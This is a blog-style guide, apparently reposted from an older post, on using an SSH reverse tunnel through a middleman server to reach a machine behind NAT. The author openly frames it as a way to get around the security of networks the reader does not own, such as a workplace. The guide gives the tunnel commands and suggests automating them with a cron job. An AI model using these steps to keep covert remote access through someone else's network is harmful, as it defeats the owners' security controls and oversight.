Bypassing NAT with client to client SSH connections

[Nytro]

Bypassing NAT with client to client SSH connections

Posted: December 19, 2011 in Guides

Okay, well I know it’s been entirely too long since I’ve written anything here, and for those of you who know me personally you know I’ve had a very hectic schedule of late. Sorry for the delay in posting, also the Ubuntu 12.04 LTS desktop and server security guides have been delayed. I’m hoping to have at least one of them up after the holidays, but no promises.

So to tithe you over for a little bit, and to get a new post up here, I’m going to discuss something that a lot of people ask about on Ubuntu Forums. It is against Ubuntu forums policy to instruct people how to bypass the security of a network they do not own. This however, is my personal blog and I will instruct whatever I want That being said, if you do this at work and get fired it’s your fault, most sysadmins will frown on this, and yes they will catch you.

This is not really a new trick, but it will bypass NAT and allow you to have an always on SSH connection to an endpoint behind a NAT router (with no ports forwarded).

This requires three systems. The endpoint (which is behind the firewall), the middleman, which is a machine you control somewhere on the internet, and the machine you want to ssh from (presumably your home machine or another system that you control).

Note : For the purposes of this guide the following IP’s are used as a point of reference.

Middleman : 192.168.0.15

Endpoint Behind Firewall : 172.16.128.4

Machine that you’re SSH’ing from : 192.168.0.14

So here we go.

Setting up the Middle Man

First things first, we need to install to install an openssh-server on our middleman and configure it as a gateway.

Note : This is done on Ubuntu, change commands appropriately for your operating environment.

sudo apt-get install openssh-server

Now we want to edit /etc/ssh/sshd_config and add the following lines.

GatewayPorts Yes
TCPKeepAlive Yes

This will keep our connections alive and allow us to tunnel through this system.

Creating a Reverse Connection From the Endpoint

Now on the endpoint machine (the one behind the firewall) we will create a reverse connection to our middleman server. This will bypass our firewall. We can automate this process by creating a cron job. However, if we do this we must use passwordless login with keys. I’m lazy so I didn’t generate keys here.

ssh -R 31337:localhost:22 dangertux@192.168.0.15

What this does is create a reverse connection and tunnel to 192.168.0.15

Connect From Your Machine

Now we connect to the middleman server from our machine.

ssh -p 31337 dangertux@192.168.0.15

Note: the password you are prompted for will be the password of the user on the machine behind the firewall.

There you go, an always on SSH client – client connection that bypasses NAT routing. Again, a friendly warning, a sysop will not take DT told me to as an excuse, besides I didn’t tell you to, I told you how

Sursa: SSH Hacks : Bypassing NAT with client to client SSH connections